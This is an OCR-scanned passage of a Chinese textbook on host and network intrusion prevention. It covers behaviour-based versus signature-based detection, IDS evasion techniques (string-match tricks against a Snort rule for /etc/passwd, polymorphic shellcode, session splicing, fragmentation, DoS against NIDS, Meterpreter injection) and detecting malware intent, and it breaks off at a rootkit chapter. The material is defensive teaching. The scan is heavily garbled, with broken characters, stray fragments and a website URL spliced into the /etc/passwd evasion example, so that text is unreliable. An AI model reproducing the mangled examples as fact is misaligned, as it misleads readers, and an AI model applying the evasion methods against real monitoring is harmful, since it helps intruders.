时 的 表现 。HIPS 将 识别 恶意 软件 修改 系统 状态 以 便 执 行 其 预期 设计 的 方法 ， 而 不 是 (就 像 1DS 那 样 ) 依靠 一 个 特征 码 来 识别 攻击 
方向 。 如 果 配 置 好 了 HIPS， 它 能 够 监控 系统 或 者 用 户 执 行 的 进程 所 作出 的 修改 。HIPS 一 般 有 提供 “标准 ”覆盖 级 别 的 默认 模 
式 。 然 而 ， 因 为 每 个 网 络 都 有 某 种 程度 的 不 同 ， 企 业 的 每 个 主要 策略 都 必须 有 自己 的 “定制 ”策略 。 


更 可 靠 的 HIPS 应 该 具备 防 Rootkit 模 块 ， 对 于 悄悄 得 到 系统 内 核 控制 权 和 主 操作 系统 控制 权 的 每 种 可 能 方法 进行 检查 。 和 传 
统 的 容易 被 轻松 击败 的 基于 特征 码 系 统 不 同 ，HIPS 寻 求 应 用 程序 工作 的 真正 方法 。 有 许多 像 VirusTotal.com 这 样 的 网 站 使 恶意 
软件 编写 者 能 够 避 开 基于 特征 码 的 引擎 。 这 些 网 站 有 助 于 测试 防 病毒 特征 码 的 精确 性 。 它 们 的 “罗宾汉 (robin hood) ” 式 方 
法 是 杰出 的 并 且 能 够 做 很 多 好 事 。 它 们 能 够 接受 各 种 二 进 制 文件 上 传 ， 然 后 分 析 上 传 的 文件 以 评估 所 有 主要 的 防 病毒 特征 码 。 上 
传 者 (恶意 软件 编写 者 ) 完成 分 析 报 告 并 且 确 定 他 所 构建 的 程序 不 会 被 足够 比例 的 防 病毒 引 警 发现 之 后 ， 如 果 他 分 发 这 段 恶意 代 
码 ， 就 是 犯罪 。HIPS 不 管 是 基于 特征 码 还 是 行为 的 ， 都 可 以 设置 为 被 动 或 者 主动 模式 ， 并 且 在 需要 的 时 候 有 能 力 捕捉 加 密 通 


信 。 


9.3 行为 与 特征 码 


HIPS 可 以 是 基于 行为 (基于 策略 或 者 专家 系统 ) 、 特 征 码 规则 集合 或 者 两 者 结合 的 。 基 于 策略 的 HIPS 一 般 使 用 清晰 定义 的 
有 关 应 用 程序 许可 或 者 不 许可 的 行为 规则 集合 ， 提 示 用 户 可 能 的 恶意 活动 并 且 要 求 用 户 “ 人 允许 ”或 者 “阻止 ”该 操作 。 专 家 系统 
更 加 复杂 ， 因 为 它们 使 用 规则 的 扩展 ， 每 当 一 个 操作 发 生 时 进行 计 分 和 评估 ， 然 后 为 用 户 做 出 决策 ， 这 个 决策 可 能 跟随 着 一 个 提 
示 ， 要 求 用 户 “人 允许 ”或 者 “阻止 ”该 操作 。 


最 后 ，HIPS 可 以 配置 为 不 需要 管理 员 参 与 ， 因 为 系统 可 以 配置 为 根据 网 络 行为 训练 (调整 ) 允许 或 者 阻止 。 这 种 配置 可 能 
会 令 人 头痛 ， 但 是 如 果 坚 持 并 且 适 当地 调整 HIPs 系 统 ， 回 报 是 很 丰厚 的 。 


在 用 户 做 出 这 个 决定 之 后 ， 专 家 系统 将 从 用 户 的 决定 中 学 习 ， 然 后 参考 这 个 事件 制作 新 的 规则 。 最 终 ， 这 种 HIPSs 实 施 方法 
是 最 佳 的 ， 因 为 系统 总 体 上 可 以 自己 推导 出 HKLM\Software\Microsoft\Windows\CurrentVersion\Run 中 是 否 有 一 个 恶意 软 
件 添 加 的 注册 表 项 。 这 种 基于 专家 系统 的 方法 已 经 证 明生 成 的 假 阳 性 较 少 。 但 是 ， 当 假 阳 性 发 生 时 ， 也 足以 让 大 部 分 管理 员 在 一 
段 时间 里 记 住 那 种 痛苦 。 假 阳性 可 能 导致 对 这 个 占用 日 常 操作 资源 而 什么 也 查 不 出 来 的 系统 失去 信任 。 


与 主要 关注 动态 代码 分 析 的 基于 特征 码 扫描 程序 不 同 ， 基 于 行为 的 HIPS 关 注 于 发 现 和 阻止 一 般 的 恶意 行为 和 它们 执行 时 所 
产生 的 事件 。 行 为 式 系统 寻找 各 种 标志 以 及 /或 操作 类 型 ， 例 如 文件 /系统 修改 ， 未 知 应 用 程序 /脚本 启动 ， 未 知 应 用 程序 注册 为 
自 启 动 ， 动 态 链接 库 (DLL) 注入 ， 进 程 /线程 修改 以 及 分 层 服务 提供 者 (LSP) 安装 。 关 注 于 这 些 领 域 是 非常 强大 的 安全 方法 ， 
因为 有 无 限 的 代码 编写 方法 能 够 避 开 基于 特征 码 工 具 发 布 的 标准 特征 码 集 ， 但 是 恶意 代码 表现 的 方式 是 有 限 的 。 让 我 们 来 深入 地 
观察 每 种 方法 ， 确 定 哪 种 方法 提供 更 强大 的 恶意 软件 防范 。 


9.3.1 ”基于 行为 的 系统 


基于 行为 和 基于 特征 码 的 安全 应 用 程序 之 间 有 显著 的 不 同 ， 最 终 的 结果 也 有 很 大 的 不 同 。 两 者 的 总 体 问题 都 与 检测 方法 紧密 
相连 ; 行为 式 安全 使 用 已 知 应 用 程序 的 模式 映射 而 特征 码 安全 利用 已 识别 的 恶意 软件 执行 进程 的 已 知 模式 。 这 一 过 程 足以 在 运行 


一 段 时 间 之 后 检测 信任 应 用 程序 或 者 流氓 应 用 程序 中 的 反常 行为 。 甚 至 在 今天 ， 一 些 上 默认 的 基于 行为 引擎 在 恶意 软件 试图 在 受 保 
护 主 机 上 写 入 或 者 执行 时 还 工作 得 相当 好 。 


基于 行为 保护 系统 的 弱点 是 对 最 终 用 户 和 企业 安全 管理 员 理 解 的 依赖 ， 以 及 对 识别 恶意 软件 行为 的 依赖 。 基 于 行为 的 系统 的 
长 处 (前 一 节 提 到 的 关注 领域 也 是 大 部 分 合法 应 用 程序 的 标准 。 理 解 事件 的 好 坏 可 能 很 快 地 成 为 艰辛 的 过 程 ， 用 户 因 为 无 尽 的 
警告 而 诅 丧 ， 最 终 可 能 关闭 该 系统 。 幸 好 大 部 分 行为 式 系统 有 默认 的 、 已 知 的 和 许可 的 应 用 程序 白 名 单 和 黑 名 单 ， 而 且 一 般 在 企 
业内 部 或 者 通过 容易 获取 的 更 新 服务 进行 更 新 。 


行为 式 系统 的 一 个 弱点 是 ， 除 非 恶 意 软 件 执行 被 登记 为 恶意 的 操作 ， 否 则 就 无 法 识别 。 因 此 ， 即 使 行为 式 系统 识别 了 恶意 行 
为 ， 破 坏 也 可 能 已 经 产生 。 不 止 一 种 基于 行为 的 识别 系统 利用 专家 系统 和 启发 式 方法 ， 使 用 规则 库 和 相关 的 严重 程度 权 值 进行 工 
作 。 最 终 ， 基 于 行为 的 系统 的 固有 弱点 是 有 时 候 不 能 在 恶意 软件 刚 引 入 系统 时 发 现 它们 ， 因 为 行为 式 引 警 搜索 的 是 恶意 软件 行为 
而 不 是 特征 码 ， 而 如 果 具 有 能 够 识别 恶意 软件 的 特征 码 就 能 更 快 地 发 现 恶意 软件 。 只 要 恶意 软件 不 活动 ， 行 为 式 系统 就 不 能 发 
现 ， 但 是 恶意 软件 执行 时 ， 就 会 因 其 行为 而 被 发 现 。 


我 们 不 能 忘记 基于 异常 的 监测 系统 ， 这 一 般 用 在 业务 网 络 上 ， 在 性 质 上 仍然 是 基于 规则 的 。 简 单 地 说 ， 定 义 固有 的 规则 以 发 
现 特定 类 型 的 通信 模式 行为 。 对 手 可 以 了 解 哪些 规则 “默认 ”安装 以 及 /或 者 是 “一 般 得 到 接受 的 安全 方法 ”， 从 而 再 次 使 用 信 
息 安全 业界 的 最 佳 实 践 来 对 付 我 们 ， 开 发 恶意 软件 避 开 检测 。 这 些 混合 系统 被 称 为 基于 异常 的 入 侵 检测 或 者 入 侵 检测 /预防 系统 
(IDPS) 。 仅 仅 依赖 基于 行为 的 系统 是 有 缺陷 的 ， 尽 管 这 些 系统 提供 许多 好 处 。 记 住 ， 基 于 行为 的 系统 的 好 坏 取决 于 策略 。 开 
箱 即 用 的 默认 策略 没有 足够 的 精确 性 来 应 付 各 种 网 络 ， 所 以 定制 策略 很 重要 。 


9.3.2 ”基于 特征 码 的 系统 


安全 社区 中 的 大 部 分 人 都 曾经 对 基于 特征 码 的 入 侵 检测 系统 提出 负面 的 意见 。 这 些 系统 确实 有 众所周知 的 弱点 ， 但 是 也 有 长 
处 。 它 们 的 长 处 主要 是 ， 通 过 标记 文件 中 的 代码 或 者 数据 的 特定 段落 ， 用 单一 的 特征 码 精确 地 识别 著名 的 攻击 方法 和 恶意 软件 。 
基于 特征 码 的 扫描 程序 也 能 在 识别 出 特定 的 预定 义 特征 码 时 识别 恶意 软件 ， 而 且 能 够 清理 之 前 未 被 感染 的 系统 。 特 征 码 引擎 是 最 
容易 实施 和 管理 的 ， 因 为 任何 开源 或 者 商业 的 IDs 都 有 标准 的 特征 码 更 新 服务 。 基 于 特征 码 的 引擎 依赖 部 分 的 、 精 确 的 或 者 混合 
的 匹配 识别 恶意 软件 ; 例如 ， 系 统 可 以 识别 一 个 文件 名 、SHA 或 者 MD5hash， 这 些 可 以 匹配 恶意 软件 本 身 。 以 性 能 和 吞吐 量 上 
看 ， 基 于 特征 码 的 系统 通常 也 是 最 快 的 。 





不 过 ， 基 于 特征 码 的 入 侵 检测 系统 有 一 个 共同 的 弱点 一 一 不 能 发 现 系统 中 没有 特征 码 的 任何 恶意 软件 。 相 天 的 问题 是 无 法 
有 效 地 识别 著名 攻击 和 恶意 软件 的 微小 变种 。 攻 击 者 可 以 很 容易 地 用 无 数 种 方法 修改 现 有 的 恶意 软件 ， 以 绕 过 公开 和 /或 私有 的 
特征 码 集 。 下 面 是 一 些 这 种 方法 : 


. 修改 字符 串 ， 例 如 代码 中 的 文本 ， 像 简单 的 字符 事 、 代 码 注 释 或 者 不 随 功能 改变 的 打印 字符 串 。 
十 六 进 制 编辑 。 

. 实现 已 知 不 被 受害 者 的 IDS 供 应 商 支持 的 打包 程序 。 

< 实现 相同 攻击 的 替代 传递 方法 。 

.采用 简洁 的 技术 ， 能 够 修改 为 IDS 供 应 商 所 识别 的 特征 码 的 各 种 方法 。 

- 定制 开发 的 、 在 头 几 个 发 行 版 本 之 前 多 半 无 法 检测 的 恶意 软件 。 


恶意 软件 编写 者 可 以 在 各 种 像 virustotal.com 和 viruscan.jotti.org 这 样 的 网 站 上 测试 他 们 最 新 的 毁灭 装置 被 安全 特征 码 发 现 
的 可 能 性 。 这 些 网 站 对 于 安全 社区 也 很 好 用 ， 可 以 识别 和 测试 恶意 软件 样本 。 不 利 的 一 面 是 这 些 网 站 也 被 用 来 对 抗 安全 社区 。 你 


的 恶意 软件 样本 可 能 对 1DS 或 者 [Ps 特征 码 进行 测试 ， 也 可 以 测试 防 病毒 特征 码 ， 这 取决 于 使 用 的 网 站 。 


最 终 ， 基 于 特征 码 的 引 警 只 能 在 事后 或 者 攻击 方法 已 经 公开 之 后 才能 了 解 它 们 ， 因 为 特征 码 不 能 在 这 之 前 制作 出 来 。 这 些 特 
征 码 更 新 一 般 每 周 分 发 一 次 ， 这 不 会 给 用 户 带 来 任何 好 处 ， 新 的 蠕虫 可 以 在 几 个 小 时 内 传 遍 全 球 。 前 面 的 9.1 节 “HIPS 体 系 结 
构 ” 中 提 到 ， 这 些 安全 系统 的 作用 仅仅 取决 于 其 配置 及 其 在 网 络 中 的 位 置 。 


9.4” 反 检测 钦 避 技术 


IPS 系 统 具 有 令 人 难以 置信 的 高 效率 ， 因 为 它们 是 嵌入 式 的 并 且 不 需要 解释 网 络 栈 。 入 侵 预 防 系统 能 够 轻易 地 清除 TCP 标 志 
和 会 话 中 传递 的 传输 信息 一 一 你 希望 确保 的 信息 被 剥离 ， 以 便 更 好 地 保护 你 的 内 部 系统 。 剥 离 的 信息 包括 操作 系统 、 应 用 程序 
版 本 以 及 /或 特定 的 内 部 协议 设置 。IPS 还 能 够 更 正 循环 元 余 校 验 和 未 分 段 的 封包 ， 以 及 可 用 于 欺骗 其 他 网 络 安全 设备 (如 入 侵 检 
测 系统 和 防火 墙 ) 的 TCP 排 序 方法 。 最 重要 的 是 ，IPS 对 于 现存 的 大 量 1DS 躲 避 技术 不 敏感 。 我 们 将 很 快 地 着 重 介绍 IDS 领 域 的 一 
些 流行 积 避 技术 。 这 些 技术 说 明了 有 具有 恶意 的 人 借以 绕 过 网 络 保护 ， 对 安全 监控 人 员 保 持 隐蔽 的 途径 。 


@ 基本 字符 串 匹 配 弱点 





这 种 方法 是 不 引起 保持 警惕 的 安全 管理 员 怀 疑 而 躲避 入 侵 检 测 系统 的 最 简单 方法 。 几 乎 所 有 人 入侵 检 测 系统 都 在 很 大 程度 上 依 
赖 于 基本 字符 串 匹 配 。 下 面 的 IDS 特 征 码 是 很 早 的 SNORT 特 征 码 的 一 个 例子 ， 这 种 特征 码 是 大 部 分 基于 特征 码 的 系统 的 事实 标 
准 : 


alert tcp SEXTERNAL NET any -> SHTTP_ SERVERS 80 (msg: "WEB-MISC 
/etc/passwd";flags: A+; content:"/etc/passwd:"; nocase; 
classtype:attempted-recon; sid:1122; rev:1;) 


这 里 ， 你 可 以 简单 地 将 etc/passwd 改 写 为 /etc/rc.d/http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach ebook/uncompressed/17251/OEBPS/Text/../.\passwd 来 绕 开 它 ， 实 际 上 这 是 完全 相同 的 路 
径 ; 你 只 是 把 这 个 目录 向 上 和 向 下 各 移动 一 次 。 精 确 字符 串 匹 配 的 基本 问题 就 是 小 的 修改 可 以 建立 非常 多 的 字符 串 ， 对 这 些 变种 

Wrest 


你 几乎 总 是 必须 生成 不 同 的 特征 码 。 而 且 ， 使 用 正则 表达 式 (REGEX) 可 能 由 于 需要 系统 识别 有 效 字符 串 和 恶意 字符 串 之 间 的 
区 别 而 增加 系统 负载 。 


o 多 态 Shellcode 





这 种 方法 是 非常 新 颖 的 ， 根 据 过 去 的 恶意 软件 躲避 技术 ， 注 入 的 方向 有 限 (缓冲 区 溢出 ) 。 标 准 的 IDs 特 征 码 检测 依赖 网 络 
流量 分 析 、 协 议 分 析 以 及 这 种 方法 所 躲避 的 特征 码 匹配 。 多 态 Shellcode 由 K2 开 发 ， 随 ADMmutate 发 行 。ADMmutate 是 用 于 
混淆 NOP sled 和 外 壳 代码 检测 的 工具 : 


NOP sled 是 目前 最 十 老 但 是 最 受 欢迎 的 内 存 堆 栈 缓冲 区 溢出 的 执行 技术 。 
* Shellcode 是 一 个 作为 负载 传递 的 代码 片段 ， 用 于 打开 一 个 反 向 代码 外 过， 攻击 者 可 以 由 此 远程 控制 受害 系统 。 


IDS 系 统一 般 能 对 NOP sled 和 shellcode 特 征 码 做 出 反应 。ADMmutate 使 攻击 者 通过 网 络 发 送 一 个 攻击 ， 并 且 每 次 都 使 其 


有 足够 的 差异 ， 使 得 NIDS 不 能 很 容易 地 检测 出 来 。 


e 会 话 拼 接 


:AZ 一 | 
LIT. 





这 种 方法 是 一 种 低级 的 反 !IDS 技 术 ， 用 于 将 通常 在 一 个 封包 中 发 送 的 数据 分 割 以 避免 检测 。 例 如 ，GETHTTP/1.0 可 以 被 分 
割 为 多 个 封包 : G，ET，/，HT，TP，/，1，.0。 使 用 这 种 方法 ， 恶 意 软件 编写 者 可 以 避 开 NIDS。 这 种 方法 对 于 基于 HTTP 的 会 
话 很 容易 进行 ， 因 为 会 话 是 普通 文本 而 且 也 可 以 依靠 SQL 查询 来 进行 。 


e 碎片 攻击 


= 4 = 
流行 ， 





这 种 方法 将 IP 数 据 报 分 解 为 较 小 的 封包 ， 使 其 可 以 通过 不 同 的 网 络 信道 或 者 媒体 传输 ;受害 者 过 后 重组 这 些 封包 。NIDS 具 
有 某 种 形式 的 封包 重组 和 比较 的 能 力 仅仅 是 前 几 年 的 事情 。 围 绕 封包 重组 的 问题 是 ，NIDS 存 储 足 以 识别 需要 重组 的 封包 同时 继 
续 监 控 网 络 的 其 他 部 分 、 并 且 重 组 每 个 发 现 的 会 话 所 需要 的 巨大 开销 。 重 组 可 能 很 快 地 使 NIDS 性 能 下 降 或 者 使 其 因 超载 而 出 


N= =i 
IRo 


O” as 


sw 一 
LIT. 





这 种 形式 的 躲避 可 以 以 两 种 方式 使 用 : 对 设备 以 及 /或 对 管理 设备 的 操作 员 。 可 用 于 对 NIDS 进 行 拒绝 服务 (DoS) 攻击 的 工 
具 包 括 : Stick，Snot， 以 及 网 上 可 以 找到 的 许多 其 他 工具 。 使 用 Do 技术 进行 1Ds 躲 避 的 最 常见 目标 是 : 


引入 过 多 的 触发 特征 码 的 流量 ， 使 NIDS 管 理 员 无 法 识别 哪些 攻击 是 真 ， 哪 些 是 假 阳性 。 


. 引入 过 多 的 记录 信息 ， 使 物理 存储 资源 完全 被 消耗 ， 阻 止 NIDS 记 录 更 多 的 网 络 事件 。 





. 在 网 上 引入 足够 的 数据 ， 消 耗 设 备 的 处 理 资源 ， 使 NIDS 无 法 看 到 其 他 网 络 会 话 。 


. 引入 NIDS 上 的 软件 或 者 硬件 故障 ， 以 便 完全 将 其 锁定 ， 直 到 重新 启动 为 止 。 


— 结合 NIPS 和 HIPS 


对 于 深度 防御 策略 的 一 种 很 好 的 方法 是 ， 在 你 的 企业 中 混合 部 署 NIPs 设 备 和 HIPS 主 机 。 通 过 合并 这 些 设备 和 主机 ， 并 且 为 
你 的 网 络 安全 设备 (防火墙 、IDS、 内 容 过 滤 和 管理 等 ) 建立 中 心 报告 机 制 ， 能 够 增强 网 络 保护 水 平 ， 这 些 设 备 的 保护 /阻止 能 
力 还 能 改善 你 的 响应 时 间 。 尽 管 HIPS 从 事实 上 看 很 强大 ， 它 能 够 同样 地 分 析 加 密 和 未 加 密 通 信 ， 但 是 主机 操作 系统 的 加 密 /解密 
进程 能 使 HIPS 看 到 整个 会 话 。 具 有 了 解 会 话 级 别 信息 的 能 力 会 使 你 在 现代 的 攻击 开始 (如 基于 客户 的 攻击 ) 时 具备 更 多 的 控制 
能 力 。HIPS 的 缺点 之 一 是 对 网 络 事件 的 迟钝 ， 因 为 它 只 看 到 以 自己 的 IP 为 目标 的 通信 。 实 施 了 中 心 管理 系统 ， 安 全 管理 员 就 能 
将 整个 网 络 的 事件 关联 起 来 ， 从 而 弥补 这 一 弱点 。 


NIPS 对 于 阻止 和 保护 整个 网 络 的 通信 是 很 有 效 的 。 它 能 够 发 现 各 种 网 络 事件 ， 如 主机 扫描 和 恶意 软件 传播 。 当 NIPS 发 现 这 
种 活动 ， 它 可 以 阻止 并 保护 网 络 其 余部 分 免 遭 侵害 ， 同 时 还 向 你 发 出 攻击 的 警报 。IDS 只 能 旁观 ， 如 果 它 能 发 现 攻 击 ，“ 可 


”会 警告 你 。 但 是 ，NIPS 也 有 一 个 短处 : 它 是 一 个 在 线 的 设备 ， 可 能 遭 到 某 种 攻击 而 关闭 ， 这 实质 上 阻止 了 所 有 经 过 的 流 
量 。 还 要 指出 一 点 ，NIDS3 或 者 NIPs 不 能 像 HIPs 那 样 ， 在 操作 系统 级 别 上 发 现 攻击 ， 所 以 组 合 这 些 系统 ， 使 它们 能 在 管理 和 事件 
关联 方面 协同 工作 是 很 重要 的 。 


amp 
an 


各 种 技术 的 不 同 数据 输出 可 能 使 网 络 管理 员 难 以 应 付 。 重 要 的 是 具有 网 络 中 所 发 生 情况 的 非常 简洁 、 完 整 的 视图 。 安 全 信息 
和 事件 管理 (SIEM) 解决 方案 组 合 不 同 的 安全 事件 和 来 自 这 些 技术 的 安全 信息 ， 为 网 络 管理 员 提 供 有 意义 的 信息 。 


@ IP SREZ 


在 本 节 的 开头 ,我 们 提 到 了 IPS 可 以 应 对 多 种 最 新 1DS 铅 避 技 术 ， 但 是 它 并 不 是 完美 的 。2013 年 ，Michael Dyrmose##5 y 
一 篇 关于 如 何 挫败 IPs 的 文章 。 他 简要 地 说 明了 ， 操 纵 著名 攻击 手段 的 首 标 、 载 荷 和 数据 流 ， 可 能 欺骗 IPS 检 测 引 警 放 过 这 些 流 
量 ， 使 攻击 者 得 到 IPs 保 护 的 目标 系统 的 外 壳 访 问 权 。 你 可 以 在 https://www.sans.org/reading- 
room/whitepapers/intrusion/beating-ips-34137 了 解 他 的 作品 。 


这 里 的 相关 原理 与 粉饰 恶意 软件 避 开 检测 系统 相同 。 攻 击 者 理解 安全 产品 识别 威胁 的 原理 ， 因 此 他 们 可 以 修改 这 些 变量 或 者 
特性 ， 其 骗 安全 产品 ， 使 其 相信 通过 的 流量 中 没有 恶意 内 容 。 


9.5 ”如 何 检测 意图 


回答 这 个 问题 的 能 力 多 年 来 对 企业 安全 型 产品 来 说 是 “ 金 砖 ”。 安 全 业界 确实 能 够 识别 意图 的 唯一 方法 是 ， 在 感染 之 后 进行 
恶意 软件 的 事后 分 析 。 在 感染 之 后 识别 意图 不 是 我 们 所 需要 的 。 发 现 恶意 软件 的 意图 已 经 超出 了 分 析 恶 意 软件 的 直接 功能 本 身 ; 


这 只 是 意图 识别 过 程 的 第 一 阶段 。 


识别 一 个 操作 是 否 确实 是 用 户 驱 动 的 或 者 用 户 驱动 的 功能 (用户 意图 ) 是 一 件 困难 的 任务 。 由 于 存在 着 操作 系统 、 应 用 程序 
和 后 台 服 务 ， 很 难 不 产生 许多 假 阳 性 。 考 虑 到 这 些 挑 战 ， 识 别 恶 意 软件 意图 极其 困难 。 应 用 程序 无 法 分 辨 用 户 驱 动 和 恶意 软件 驱 
动 的 操作 ， 因 为 最 常见 的 应 用 程序 共享 执行 相似 任务 的 后 台 功 能 。 在 某 些 情况 下 ， 来 自用 户 驱动 应 用 程序 和 恶意 软件 的 网 络 请 
求 、 文 件 访问 请 求 或 者 系统 调用 完全 相同 。 为 了 识别 意图 ， 询 问 如 下 问题 : 


> 你 如 何 检测 恶意 软件 意图 一 一 在 执行 时 或 者 通过 执行 ? 
* 在 识别 意图 的 推理 模型 中 哪些 操作 有 用 ? 
你 使 用 什么 工具 或 者 方法 检测 意图 ? 
下 面 是 一 些 识别 或 者 推断 用 户 操作 和 恶意 软件 操作 之 间 差 异 的 一 些 简单 概念 


- 用 户 可 能 通过 调用 explorer.exe 进 程 的 一 个 快捷 方式 启动 浏览 器 (Microsoft Edge、Firefox、Chrome 等 ) 。 从 这 个 角度 看 ， 你 
可 能 推断 这 是 用 户 启动 的 行为 ， 直 接应 用 程序 调用 则 相反 。 


* 系统 可 以 识别 一 个 网 络 IP 是 不 是 通过 直接 网 络 调用 和 /或 通过 用 户 启 动 的 一 个 进程 进行 连接 的 。 例 如 ， 一 个 指 


向 www.Facebook.comy/maliciousprofile 的 连接 是 通过 浏览 器 内 的 一 个 鼠标 单 击 还 是 从 与 浏览 器 无 关 的 进程 中 生成 ? 


重要 的 是 ， 鼠 标 或 者 用 户 启动 的 活动 以 及 这 些 活 动 相关 的 进程 行为 。 恶 意 软 件 中 ， 直 接 进程 请 求 一 般 不 需要 实际 地 在 一 个 可 
信 进 程 中 运行 。 但 是 ， 有 一 些 攻击 工具 可 用 于 将 恶意 软件 直接 注入 到 进程 中 以 避免 被 发 现 。 


Meterpreter 就 是 这 样 的 工具 ， 它 是 Metasploit 框 架 的 一 个 插件 。Meterpreter 能 够 通过 不 在 进程 表 中 创建 新 的 进程 来 避免 
检测 ， 这 通常 是 恶意 软件 或 者 主机 入 侵 的 确凿 证 据 。Meterpreter 实 际 上 在 它 所 利用 的 进程 (一 般 是 系统 级 别 服务 ) 中 注入 一 个 
额外 的 线程 。 这 样 ， 它 不 必要 使 用 chroot (修改 文件 权限 的 Unix 命 令 ) 或 者 修改 进程 的 任何 权限 而 触发 HIPS。 这 只 是 用 于 绕 过 
检测 的 一 组 工具 中 的 一 个 例子 。 


恶意 软件 意图 可 以 通过 分 析 每 个 恶意 软件 操作 的 输出 或 者 结果 来 帮 现 。 为 此 ， 主 机 必须 允许 恶意 软件 运行 或 者 运行 于 系统 上 
一 个 虚拟 的 沙 箱 而 使 之 无 害 。 虚 拟 沙 箱 的 设计 使 一 个 未 知 或 者 不 信任 的 程序 可 以 运行 在 一 个 隔离 的 环境 中 ， 不 访问 计算 机 文件 或 
者 网 络 ， 以 及 /或 系统 设置 。Threat Analyzer (可 从 http://www.threattrackse curity.com/Sandbox 上 订购 ) 这 样 的 工具 使 安 
全 分 析 人 员 和 能够 从 一 个 虚拟 沙 箱 中 运行 可 疑 的 恶意 软件 ， 确 定 该 文件 是 否 恶意 并 且 测 试 文件 的 未 知 恶意 内 容 或 者 行为 。 


注意 : 虚拟 沙 箱 在 速度 和 性 能 上 已 经 取得 了 巨大 的 飞跃 ， 现 在 它们 已 经 足以 在 IPS 技 术 中 联机 使 用 。 只 要 可 以 拦截 文件 ， 就 
可 以 将 其 放 入 沙 箱 ， 等 待 允许 或 者 拦截 该 文件 的 结论 。 


允许 恶意 软件 为 分 析 目 的 而 运行 能 让 你 确定 恶意 软件 的 功能 及 其 配置 。 推 断 出 的 最 终 的 目标 可 能 是 身份 盗窃 、 欺 诈 或 者 单纯 
的 传播 ; 知道 这 一 情况 可 以 帮助 你 更 好 地 理解 恶意 软件 的 意图 。 接 下 来 ， 管 理 员 更 好 地 理解 对 企业 的 威胁 ， 而 安全 团队 能 够 在 合 
适 的 位 置 安排 保护 。 


9.6 ”HIPS 和 安全 的 未 来 


从 世纪 之 交 起 ， 防 病毒 公司 慢 慢 地 失去 越 来 越 多 的 发 现 恶 意 软件 变种 和 自制 产品 的 能 力 。 但 是 现在 ， 防 病毒 公司 慢 慢 地 将 基 
于 HIPS 的 模块 组 合 到 产品 中 。 


HIPS 产 品 本 身 不 是 抵抗 所 有 网 络 威胁 的 银 弹 ， 只 是 用 于 防护 网 络 的 男 一 个 工具 ， 它 们 既 可 以 操作 于 主动 防护 (阻止) 也 可 
以 操作 于 被 动 〈 仪 发 出 警告 和 报告 ) 模式 ， 而 且 它 们 还 能 识别 和 阻止 实际 攻击 ， 而 不 只 是 像 NIDs 那 样 空转 和 发 出 警告 。 随 着 企 
业 的 急剧 增长 ， 预 算 变 得 更 加 紧张 ， 使 用 IPs 解 决 方案 提供 功效 变 得 更 有 成 本 效益 。 我 们 并 不 是 说 IPs 解 决 方案 能 够 代 蔡 安 全 工程 
师 ， 因 为 终究 要 有 人 验证 自动 化 系统 的 策略 、 操 作 和 输出 。 安 全 引擎 也 需要 进行 干预 ， 以 便 识 别 、 分 析 、 搜 集 证 据 ， 并 且 验 证 真 
正 的 攻击 ， 操 作 和 维护 安全 型 系统 。 


IPS 解 决 方案 最 出 色 的 部 分 是 ， 你 可 以 在 网 络 中 的 任何 地 方 对 其 进行 分 层 : 


* 你 可 以 将 IPS 解 决 方案 部 署 在 客户 端 和 服务 器 端的 网 段 之 间 ， 使 用 主动 防护 模式 ， 这 将 保护 你 的 服务 器 、 关 键 公司 服务 以 
及 数据 与 用 户 分 离 〈 用 户 是 每 个 管理 员 的 祸患) o 


.你 可 以 为 整个 服务 器 LAN 部 署 一 个 NIPS， 或 者 在 每 个 服务 器 上 部 署 一 个 HIPS。 两 种 解决 方案 都 有 效 ; 你 的 选择 取决 于 预 
算 以 及 你 对 NIPS 意 外 地 阻止 用 户 访 问 关 键 服务 的 疑问 。 


:你 可 以 在 Web 服 务 器 和 互联 网 之 间 部 署 一 个 IPS。 用 这 种 方法 ， 你 将 具有 在 线 防护 (实际 上 不 为 对 手 所 见 ) ， 这 个 IPS 工 作 
于 主动 防护 模式 ， 能 够 保护 你 的 Web 应 用 一 一 在 互联 网 上 最 常 遭 到 攻击 的 系统 (一般 通过 SQL 注入 和 XSS 攻 击 ) o 


现在 基于 网 络 和 主机 的 安全 应 用 程序 在 功能 上 正在 趋向 一 致 。 我 们 开始 看 到 防火 墙 、 防 病毒 、 应 用 程序 防御 、 内 容 管 理 和 人 入 
侵 预 防 技术 全 都 合并 成 为 一 种 统一 安全 解决 方案 提供 混合 的 核心 安全 技术 的 解决 方案 在 多 年 以 后 将 会 超过 单独 的 解决 方案 ; 现 
在 ， 供 应 商 正 在 创建 打包 了 整套 安全 解决 方案 的 合并 解决 方案 。 有 很 多 供应 商 能 够 提供 你 正在 寻求 的 入 侵 预 防 服务 。 在 2004 
年 ，Gartner 宣 称 “IDS 已 死 ，IPS 万 岁 ”， 掀 起 了 IPS 热 潮 ， 从 此 这 种 声浪 越 来 越 大 。 但 是 ，1Ds 仍 然 大 量 存在 ， 因 为 如 果 没 有 
它 ， 就 难以 保护 端点 安全 。 例 如 ， 攻 击 者 使 用 的 大 部 分 后 门 、RAT (远程 访问 工具 ) 和 特洛伊 木马 。1SD 解 决 方案 仍然 能 够 检测 


出 大 部 分 此 类 恶意 软件 类 别 和 家 族 。1DS 仍 然 是 其 他 安全 解决 方案 的 很 好 补充 ， 用 于 保护 网 络 和 每 个 连接 到 它 的 端点 。 


9.7 Wwe 


如 果 你 希望 避免 恶意 软件 的 爆发 ， 应 该 在 企业 体系 结构 中 实施 一 个 IPs 解 决 方案 。 我 们 的 建议 是 ， 在 你 的 关键 或 者 操作 性 的 
服务 器 端 和 客户 端 网 段 之 间 以 及 互联 网 和 你 的 Web 停 火 区 (DMZ) 之 间 部 署 嵌 入 式 的 NIPS。 在 你 的 客户 工作 站 上 部 署 健壮 的 
HIPS 也 能 显著 地 增强 你 在 保护 企业 免 遭 恶意 软件 侵害 时 的 整体 安全 态势 。 在 你 的 企业 中 评估 公司 资产 始终 是 很 重要 的 ， 不 管 这 
些 资 产 所 承担 的 是 什么 角色 。 这 有 助 于 你 正确 地 部 署 基于 主机 和 网 络 的 保护 ， 并 且 能 为 你 的 企业 提供 最 佳 的 保护 范围 。 


第 10 章 ”Rootkit 检 测 


竺 ， 备 ,一 个 客人 正在 裔 你 的 房 门 。 你 打开 门 告诉 客人 说 “这 里 没 人 ”。 客 人 说 “好 的 。， 然 后 离开 。 这 是 不 是 很 奇怪 ? 是 
的 ， 这 是 Rootkit 检 测 的 一 个 隐喻 。 你 明白 Rootkit 检 测 是 种 矛盾 。 如 果 Rootkit 正 常 地 进行 着 自己 的 工作 ， 它 就 能 完全 控制 操作 
